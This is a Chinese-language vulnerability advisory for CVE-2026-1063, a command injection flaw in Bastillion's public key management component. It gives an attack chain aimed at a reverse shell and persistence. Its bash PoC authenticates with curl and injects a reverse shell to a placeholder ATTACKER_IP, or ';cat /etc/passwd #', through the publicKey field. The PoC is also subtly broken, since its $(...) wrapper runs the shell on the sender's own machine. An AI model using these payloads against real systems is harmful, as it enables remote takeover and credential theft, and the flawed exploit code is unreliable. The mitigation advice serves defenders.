CVE-2026-1063: Bastillion Public Key Management System命令注入漏洞

漏洞信息

漏洞编号

CVE-2026-1063

漏洞类型

命令注入

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

bastillion-io Bastillion

漏洞概述

CVE-2026-1063是bastillion-io Bastillion应用中一个中等严重性的命令注入漏洞。该漏洞存在于Bastillion 4.0.1及以下版本的Public Key Management System组件中，具体受影响的文件为src/main/java/io/bastillion/manage/control/AuthKeysKtrl.java。攻击者可通过操纵公钥管理系统中的特定参数实现命令注入攻击。由于该漏洞的利用代码已公开披露，且供应商在收到通知后未做出任何回应，因此该漏洞可能已被广泛利用。CVSS评分4.7（中等）反映了该漏洞虽然可远程利用，但需要高权限认证，且对机密性、完整性和可用性的影响均为低级别。Bastillion是一个基于Web的开源SSH密钥管理系统，常用于企业环境中管理服务器访问凭证，因此该漏洞可能对企业IT基础设施安全构成潜在威胁。

技术细节

该命令注入漏洞位于Bastillion应用的AuthKeysKtrl.java文件中，该文件负责处理Public Key Management System的公钥管理功能。漏洞的根本原因在于应用程序对用户输入的公钥数据缺乏充分的输入验证和安全过滤，攻击者可以在公钥字段中注入恶意命令字符或命令连接符（如分号、管道符、反引号等）。当应用程序将这些未经验证的数据传递给系统命令执行函数时，注入的命令将被操作系统级别执行。由于CVSS向量显示需要高权限（PR:H）才能利用此漏洞，攻击者可能需要先获取目标系统上的有效用户账户。成功利用后，攻击者可以在服务器上执行任意系统命令，从而可能导致数据泄露、权限提升或进一步的攻击横向移动。建议管理员立即检查AuthKeysKtrl.java文件的相关代码，确保所有用户输入都经过严格的输入验证和命令转义处理。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者识别目标Bastillion实例版本，确认版本 <= 4.0.1

STEP 2

步骤2

获取访问权限：攻击者需要获取Bastillion系统的高权限账户凭据

STEP 3

步骤3

定位攻击面：访问Public Key Management System功能模块

STEP 4

步骤4

构造恶意载荷：在公钥字段中注入命令注入payload，如使用分号、管道符或反引号等命令连接符

STEP 5

步骤5

触发漏洞：提交包含恶意命令的公钥数据，应用程序未正确过滤导致命令执行

STEP 6

步骤6

建立持久化：获取反弹shell或执行后续恶意操作，实现命令控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# CVE-2026-1063 PoC - Bastillion Command Injection
# Affected: bastillion-io Bastillion <= 4.0.1
# Component: Public Key Management System (AuthKeysKtrl.java)

TARGET_URL="http://target-server:8080"
USERNAME="admin"
PASSWORD="password"
ATTACKER_IP="attacker-ip"
ATTACKER_PORT="4444"

# Step 1: Authenticate to Bastillion
COOKIE_JAR=$(mktemp)
curl -k -c $COOKIE_JAR -d "username=$USERNAME&password=$PASSWORD" \
     "$TARGET_URL/login" -L 2>/dev/null

# Step 2: Inject malicious command via Public Key Management
# Using reverse shell payload with command injection
PAYLOAD="$(bash -i >& /dev/tcp/$ATTACKER_IP/$ATTACKER_PORT 0>&1)"

# Alternative: Direct command execution payload
ALT_PAYLOAD=";cat /etc/passwd #"

curl -k -b $COOKIE_JAR \
     -X POST \
     -d "publicKey=$PAYLOAD" \
     -d "description=Malicious Key" \
     "$TARGET_URL/api/keys/add" 2>/dev/null

echo "[*] Payload sent. Check listener on port $ATTACKER_PORT"
rm -f $COOKIE_JAR

影响范围

bastillion-io Bastillion <= 4.0.1

防御指南

临时缓解措施

由于该漏洞已公开且供应商未及时响应修复，建议采取以下临时缓解措施：1）立即限制Bastillion公钥管理功能的网络访问，仅允许受信任的管理IP访问；2）审查并限制具有公钥管理权限的用户账户；3）如果业务允许，暂时禁用Public Key Management System功能；4）部署网络层防火墙规则，阻断对Bastillion管理接口的未授权访问；5）加强监控，密切关注与该服务相关的异常日志和可疑活动；6）考虑实施IP白名单或双因素认证机制增强访问控制。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-1063
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-1063
3 Details https://www.cvedetails.com/cve/CVE-2026-1063/
4 VulDB https://vuldb.com/cve/CVE-2026-1063
5 Link https://github.com/AnalogyC0de/public_exp/blob/main/archives/Bastillion/report1.md
6 Link https://vuldb.com/?ctiid.341631
7 Link https://vuldb.com/?id.341631
8 Link https://vuldb.com/?submit.731303